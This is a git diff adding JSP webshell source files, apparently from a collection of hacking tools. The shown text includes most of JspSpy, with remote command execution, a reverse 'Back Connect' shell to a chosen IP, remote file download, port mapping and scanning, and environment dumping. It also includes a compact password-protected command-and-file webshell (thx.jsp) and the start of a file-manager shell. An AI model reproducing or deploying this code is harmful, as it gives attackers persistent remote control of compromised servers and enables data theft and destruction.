    Instead »"+ +"year:"+ +""+ +"month:"+ +""+ +"day:"+ +""+ +""+ +"hour:"+ +""+ +"minute:"+ +""+ +"second:"+ +""+ +"

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class EditPropertyInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String f = request.getParameter("file"); +File file = new File(f); +if (!file.exists()) +return; + +String year = request.getParameter("year"); +String month = request.getParameter("month"); +String date = request.getParameter("date"); +String hour = request.getParameter("hour"); +String minute = request.getParameter("minute"); +String second = request.getParameter("second"); + +Calendar cal = Calendar.getInstance(); +cal.set(Calendar.YEAR,Integer.parseInt(year)); +cal.set(Calendar.MONTH,Integer.parseInt(month)-1); +cal.set(Calendar.DATE,Integer.parseInt(date)); +cal.set(Calendar.HOUR,Integer.parseInt(hour)); +cal.set(Calendar.MINUTE,Integer.parseInt(minute)); +cal.set(Calendar.SECOND,Integer.parseInt(second)); +if(file.setLastModified(cal.getTimeInMillis())){ +JSession.setAttribute(MSG,"Reset File Property Success!"); +} else { +JSession.setAttribute(MSG,"Reset File Property Failed!"); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VShell +private static class VsInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String cmd = request.getParameter("command"); +String program = request.getParameter("program"); +if (cmd == null) cmd = "cmd.exe /c set"; +if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; +if (JSession.getAttribute(MSG)!=null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +out.println(""+ +"
    "+ +"
    "+ +"

    Execute Program »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "+ +"

    Execute Shell »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ShellInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (type.equals("command")) { +ins.get("vs").invoke(request,response,JSession); +out.println("
    "); +out.println("
    ");
+String command = request.getParameter("command");
+if (!Util.isEmpty(command)) {
+Process pro = Runtime.getRuntime().exec(command);
+BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+String s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+out.println("
    "); +} +} else { +String program = request.getParameter("program"); +if (!Util.isEmpty(program)) { +Process pro = Runtime.getRuntime().exec(program); +JSession.setAttribute(MSG,"Program Has Run Success!"); +ins.get("vs").invoke(request,response,JSession); +} +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String path = request.getParameter("path"); +if (Util.isEmpty(path)) +return; +File f = new File(path); +if (!f.exists()) +return; +response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET)); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(f)); +BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +input.close(); +output.close(); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VDown +private static class VdInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String savepath = request.getParameter("savepath"); +String url = request.getParameter("url"); +if (Util.isEmpty(url)) +url = "http://www.baidu.com/"; +if (Util.isEmpty(savepath)) { +savepath = JSession.getAttribute(CURRENT_DIR).toString(); +} +if (!Util.isEmpty(JSession.getAttribute("done"))) { +Util.outMsg(out,"Download Remote File Success!"); +JSession.removeAttribute("done"); +} +out.println("
    "+ +"
    "+ +"

    Remote File DownLoad »

    "+ +"

    "+ +""+ +"Remote File URL:"+ +" "+ +"Save Path:"+ +""+ +""+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownRemoteInvoker extends DefaultInvoker { +public boolean doBefore(){return true;} +public boolean doAfter(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String downFileUrl = request.getParameter("url"); +String savePath = request.getParameter("savepath"); +if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) +return; +URL downUrl = new URL(downFileUrl); +URLConnection conn = downUrl.openConnection(); +BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); +BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath))); +byte[] data = new byte[1024]; +int len = in.read(data); +while (len != -1) { +out.write(data,0,len); +len = in.read(data); +} +in.close(); +out.close(); +JSession.setAttribute("done","d"); +ins.get("vd").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class IndexInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +ins.get("filelist").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MkDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String name = request.getParameter("name"); +File f = new File(name); +if (!f.isAbsolute()) { +String path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path += "/"; +path += name; +f = new File(path); +} +f.mkdirs(); +JSession.setAttribute(MSG,"Make Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MoveInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String src = request.getParameter("src"); +String target = request.getParameter("to"); +if (!Util.isEmpty(target) && !Util.isEmpty(src)) { +File file = new File(src); +if(file.renameTo(new File(target))) { +JSession.setAttribute(MSG,"Move File Success!"); +} else { +String msg = "Move File Failed!"; +if (file.isDirectory()) { +msg += "The Move Will Failed When The Directory Is Not Empty."; +} +JSession.setAttribute(MSG,msg); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class RemoteDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String dir = request.getParameter("dir"); +File file = new File(dir); +if (file.exists()) { +deleteFile(file); +deleteDir(file); +} + +JSession.setAttribute(MSG,"Remove Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +public void deleteFile(File f) { +if (f.isFile()) { +f.delete(); +}else { +File[] list = f.listFiles(); +for (File ff:list) { +deleteFile(ff); +} +} +} +public void deleteDir(File f) { +File[] list = f.listFiles(); +if (list.length == 0) { +f.delete(); +} else { +for (File ff:list) { +deleteDir(ff); +} +deleteDir(f); +} +} +} +private static class PackBatchInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (Util.isEmpty(files)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String[] arr = files.split(","); +for (String f:arr) { +File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f); +ZipEntry entry = new ZipEntry(pF.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(pF); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +zout.close(); +JSession.setAttribute(MSG,"Pack Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class PackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String packedFile = request.getParameter("packedfile"); +if (Util.isEmpty(packedFile)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +File pF = new File(packedFile); +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String base = ""; +if (pF.isDirectory()) { +zipDir(pF,base,zout); +} else { +zipFile(pF,base,zout); +} +zout.close(); +JSession.setAttribute(MSG,"Pack File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { +if (f.isDirectory()) { +File[] arr = f.listFiles(); +for (File ff:arr) { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) +tmpBase += "/"; +zipDir(ff,tmpBase+f.getName(),zout); +} +} else { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/")) +tmpBase += "/"; +zipFile(f,tmpBase,zout); +} +} +public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{ +ZipEntry entry = new ZipEntry(base+f.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(f); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +} +private static class UnPackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String savepath = request.getParameter("savepath"); +String zipfile = request.getParameter("zipfile"); +if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) +return; +File save = new File(savepath); +save.mkdirs(); +ZipFile file = new ZipFile(new File(zipfile)); +Enumeration e = file.entries(); +while (e.hasMoreElements()) { +ZipEntry en = (ZipEntry) e.nextElement(); +String entryPath = en.getName(); +int index = entryPath.lastIndexOf("/"); +if (index != -1) +entryPath = entryPath.substring(0,index); +File absEntryFile = new File(save,entryPath); +if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) +absEntryFile.mkdirs(); +BufferedOutputStream output = null; +BufferedInputStream input = null; +try { +output = new BufferedOutputStream( +new FileOutputStream(new File(save,en.getName()))); +input = new BufferedInputStream( +file.getInputStream(en)); +byte[] b = new byte[1024]; +int len = input.read(b); +while (len != -1) { +output.write(b, 0, len); +len = input.read(b); +} +} catch (Exception ex) { +} finally { +try { +if (output != null) +output.close(); +if (input != null) +input.close(); +} catch (Exception ex1) { +} +} +} +file.close(); +JSession.setAttribute(MSG,"Unzip File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VMapPort +private static class VmpInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object localIP = JSession.getAttribute("localIP"); +Object localPort = JSession.getAttribute("localPort"); +Object remoteIP = JSession.getAttribute("remoteIP"); +Object remotePort = JSession.getAttribute("remotePort"); +Object done = JSession.getAttribute("done"); + +JSession.removeAttribute("localIP"); +JSession.removeAttribute("localPort"); +JSession.removeAttribute("remoteIP"); +JSession.removeAttribute("remotePort"); +JSession.removeAttribute("done"); + +if (Util.isEmpty(localIP)) +localIP = InetAddress.getLocalHost().getHostAddress(); +if (Util.isEmpty(localPort)) +localPort = "3389"; +if (Util.isEmpty(remoteIP)) +remoteIP = "www.baidu.com"; +if (Util.isEmpty(remotePort)) +remotePort = "80"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); + +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    PortMap >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Local Ip :"+ +" "+ +" Local Port :"+ +" Remote Ip :"+ +" Remote Port :"+ +"

    "+ +" "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//StopMapPort +private static class SmpInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); +server.close(); +} +JSession.setAttribute("done","Stop Success!"); +ins.get("vmp").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MapPortInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String localIP = request.getParameter("localIP"); +String localPort = request.getParameter("localPort"); +final String remoteIP = request.getParameter("remoteIP"); +final String remotePort = request.getParameter("remotePort"); +if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) +return; +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +final ServerSocket server = new ServerSocket(); +server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); +JSession.setAttribute(PORT_MAP,server); +new Thread(new Runnable(){ +public void run(){ +while (true) { +Socket soc = null; +Socket remoteSoc = null; +DataInputStream remoteIn = null; +DataOutputStream remoteOut = null; +DataInputStream localIn = null; +DataOutputStream localOut = null; +try{ +soc = server.accept(); +remoteSoc = new Socket(); +remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); +remoteIn = new DataInputStream(remoteSoc.getInputStream()); +remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); +localIn = new DataInputStream(soc.getInputStream()); +localOut = new DataOutputStream(soc.getOutputStream()); +this.readFromLocal(localIn,remoteOut); +this.readFromRemote(soc,remoteSoc,remoteIn,localOut); +}catch(Exception ex) +{ +break; +} +} +} +public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ +new Thread(new Runnable(){ +public void run(){ +while (true) { +try{ +byte[] data = new byte[100]; +int len = localIn.read(data); +while (len != -1) { +remoteOut.write(data,0,len); +len = localIn.read(data); +} +}catch (Exception e) { +break; +} +} +} +}).start(); +} +public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ +new Thread(new Runnable(){ +public void run(){ +while(true) { +try{ +byte[] data = new byte[100]; +int len = remoteIn.read(data); +while (len != -1) { +localOut.write(data,0,len); +len = remoteIn.read(data); +} +}catch (Exception e) { +try{ +soc.close(); +remoteSoc.close(); +}catch(Exception ex) { +} +break; +} +} +} +}).start(); +} +}).start(); +JSession.setAttribute("done","Map Port Success!"); +JSession.setAttribute("localIP",localIP); +JSession.setAttribute("localPort",localPort); +JSession.setAttribute("remoteIP",remoteIP); +JSession.setAttribute("remotePort",remotePort); +response.sendRedirect(SHELL_NAME+"?o=vmp"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VBackConnect +private static class VbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object ip = JSession.getAttribute("ip"); +Object port = JSession.getAttribute("port"); +Object program = JSession.getAttribute("program"); +Object done = JSession.getAttribute("done"); +JSession.removeAttribute("ip"); +JSession.removeAttribute("port"); +JSession.removeAttribute("program"); +JSession.removeAttribute("done"); +if (Util.isEmpty(ip)) +ip = request.getRemoteAddr(); +if (Util.isEmpty(port) || !Util.isInteger(port.toString())) +port = "4444"; +if (Util.isEmpty(program)) +program = "cmd.exe"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    Back Connect >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Your Ip :"+ +" "+ +" Your Port :"+ +" Program To Back :"+ +"

    "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BackConnectInvoker extends DefaultInvoker { +public boolean doAfter(){return false;} +public boolean doBefore(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String ip = request.getParameter("ip"); +String port = request.getParameter("port"); +String program = request.getParameter("program"); +if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) +return; +Socket socket = new Socket(ip,Integer.parseInt(port)); +Process process = Runtime.getRuntime().exec(program); +(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); +(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); +JSession.setAttribute("done","Back Connect Success!"); +JSession.setAttribute("ip",ip); +JSession.setAttribute("port",port); +JSession.setAttribute("program",program); +response.sendRedirect(SHELL_NAME+"?o=vbc"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class JspEnvInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"

    System Properties >>

    "+ +"
    "+ +"
    "+ +"
      "); +Properties pro = System.getProperties(); +Enumeration names = pro.propertyNames(); +while (names.hasMoreElements()){ +String name = (String)names.nextElement(); +out.println("
    • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
      • "); +} +out.println("

    System Environment >>

      "); +Map envs = System.getenv(); +Set> entrySet = envs.entrySet(); +for (Map.Entry en:entrySet) { +out.println("
    • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
      • "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class TopInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    JspSpy Ver: 2009"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")
    Logout | "+ +" File Manager | "+ +" DataBase Manager | "+ +" Execute Command | "+ +" Shell OnLine | "+ +" Back Connect | "+ +" Port Scan | "+ +" Download Remote File | "+ +" ClipBoard | "+ +" Remote Control | "+ +" Port Map | "+ +" JSP Env "+ +"
    "); +if (JSession.getAttribute(MSG) != null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VOnLineShellInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "); +out.println("

    Shell OnLine »


    "); +out.println("
    "+ +" "+ +" "+ +" Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo"+ +"
    "+ +"
    "+ +" "+ +"
    "+ +" "+ +" "+ +" "+ +" Auto Scroll"+ +" "+ +"
    "+ +" " +); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class OnLineInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +if (Util.isEmpty(type)) +return; +if (type.toLowerCase().equals("start")) { +String exe = request.getParameter("exe"); +if (Util.isEmpty(exe)) +return; +Process pro = Runtime.getRuntime().exec(exe); +ByteArrayOutputStream outs = new ByteArrayOutputStream(); +response.setContentLength(100000000); +response.setContentType("text/html;charset="+Charset.defaultCharset().name()); +OnLineProcess olp = new OnLineProcess(pro); +JSession.setAttribute(SHELL_ONLINE,olp); +new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); +new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); +new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//错误信息流。 +Thread.sleep(1000 * 60 * 60 * 24); +} else if (type.equals("ecmd")) { +Object o = JSession.getAttribute(SHELL_ONLINE); +String cmd = request.getParameter("cmd"); +if (Util.isEmpty(cmd)) +return; +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.setCmd(cmd); +} else { +Object o = JSession.getAttribute(SHELL_ONLINE); +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.stop(); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} + +static{ +ins.put("script",new ScriptInvoker()); +ins.put("before",new BeforeInvoker()); +ins.put("after",new AfterInvoker()); +ins.put("deleteBatch",new DeleteBatchInvoker()); +ins.put("clipboard",new ClipBoardInvoker()); +ins.put("vRemoteControl",new VRemoteControlInvoker()); +ins.put("gc",new GcInvoker()); +ins.put("vPortScan",new VPortScanInvoker()); +ins.put("portScan",new PortScanInvoker()); +ins.put("vConn",new VConnInvoker()); +ins.put("dbc",new DbcInvoker()); +ins.put("executesql",new ExecuteSQLInvoker()); +ins.put("vLogin",new VLoginInvoker()); +ins.put("login",new LoginInvoker()); +ins.put("filelist", new FileListInvoker()); +ins.put("logout",new LogoutInvoker()); +ins.put("upload",new UploadInvoker()); +ins.put("copy",new CopyInvoker()); +ins.put("bottom",new BottomInvoker()); +ins.put("vCreateFile",new VCreateFileInvoker()); +ins.put("vEdit",new VEditInvoker()); +ins.put("createFile",new CreateFileInvoker()); +ins.put("vEditProperty",new VEditPropertyInvoker()); +ins.put("editProperty",new EditPropertyInvoker()); +ins.put("vs",new VsInvoker()); +ins.put("shell",new ShellInvoker()); +ins.put("down",new DownInvoker()); +ins.put("vd",new VdInvoker()); +ins.put("downRemote",new DownRemoteInvoker()); +ins.put("index",new IndexInvoker()); +ins.put("mkdir",new MkDirInvoker()); +ins.put("move",new MoveInvoker()); +ins.put("removedir",new RemoteDirInvoker()); +ins.put("packBatch",new PackBatchInvoker()); +ins.put("pack",new PackInvoker()); +ins.put("unpack",new UnPackInvoker()); +ins.put("vmp",new VmpInvoker()); +ins.put("vbc",new VbcInvoker()); +ins.put("backConnect",new BackConnectInvoker()); +ins.put("jspEnv",new JspEnvInvoker()); +ins.put("smp",new SmpInvoker()); +ins.put("mapPort",new MapPortInvoker()); +ins.put("top",new TopInvoker()); +ins.put("vso",new VOnLineShellInvoker()); +ins.put("online",new OnLineInvoker()); +} +%> +<% +try { +String o = request.getParameter("o"); +if (!Util.isEmpty(o)) { +Invoker in = ins.get(o); +if (in == null) { +response.sendRedirect(SHELL_NAME+"?o=index"); +} else { +if (in.doBefore()) { +String path = request.getParameter("folder"); +if (!Util.isEmpty(path)) +session.setAttribute(CURRENT_DIR,path); +ins.get("before").invoke(request,response,session); +ins.get("script").invoke(request,response,session); +ins.get("top").invoke(request,response,session); +} +in.invoke(request,response,session); +if (!in.doAfter()) { +return; +}else{ +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +} +} else { +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +ByteArrayOutputStream bout = new ByteArrayOutputStream(); +e.printStackTrace(new PrintStream(bout)); +session.setAttribute(CURRENT_DIR,SHELL_DIR); +Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","
    "),"left"); +bout.close(); +out.flush(); +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +%> diff --git a/jsp/hackk8/JSP_66/other/thx.jsp b/jsp/hackk8/JSP_66/other/thx.jsp new file mode 100644 index 0000000..7c9cbe4 --- /dev/null +++ b/jsp/hackk8/JSP_66/other/thx.jsp @@ -0,0 +1,59 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> +<%! +String Pwd="xc"; +String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);} +Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance(); +Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;} +void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();} +void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile(); +FileOutputStream os=new FileOutputStream(f);for(int i=0;i<% +String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs); +String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs); +StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|"); +if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}} +else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); +while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();} +else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); +bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);} +else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");} +else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");} +else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c); +MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);} +else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);} +}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString()); +%> \ No newline at end of file diff --git a/jsp/hackk8/fuck-jsp/JFolder.jsp b/jsp/hackk8/fuck-jsp/JFolder.jsp new file mode 100644 index 0000000..50e972b --- /dev/null +++ b/jsp/hackk8/fuck-jsp/JFolder.jsp @@ -0,0 +1,1022 @@ +<% +/** +JFileMan V1.0 windows platform +@Filename JFolder.jsp +@Description һ򵥵ϵͳļĿ¼ʾԴṩļˡ +@Author Steven Cee +@Email cqq1978@Gmail.com +@Bugs : ʱļ޷ʾUnixϵͳϴ +*/ +%> +<%@page errorPage="/"%> +<%@page contentType="text/html;charset=gb2312"%> +<%@page import="java.io.*,java.util.*,java.net.*" %> +<%! +private final static int languageNo=1; //Language,0 : Chinese; 1:English +String strThisFile="JFileMan.jsp"; +String strSeparator = File.separator; +String[] authorInfo={" дIJãð - - by ǿ http://www.topronet.com "," Thanks for your support - - by Steven Cee http://www.topronet.com "}; +String[] strFileManage = {" ","File Management"}; +String[] strCommand = {"CMD ","Command Window"}; +String[] strSysProperty = {"ϵ ͳ ","System Property"}; +String[] strHelp = {" ","Help"}; +String[] strParentFolder = {"ϼĿ¼","Parent Folder"}; +String[] strCurrentFolder= {"ǰĿ¼","Current Folder"}; +String[] strDrivers = {"","Drivers"}; +String[] strFileName = {"ļ","File Name"}; +String[] strFileSize = {"ļС","File Size"}; +String[] strLastModified = {"޸","Last Modified"}; +String[] strFileOperation= {"ļ","Operations"}; +String[] strFileEdit = 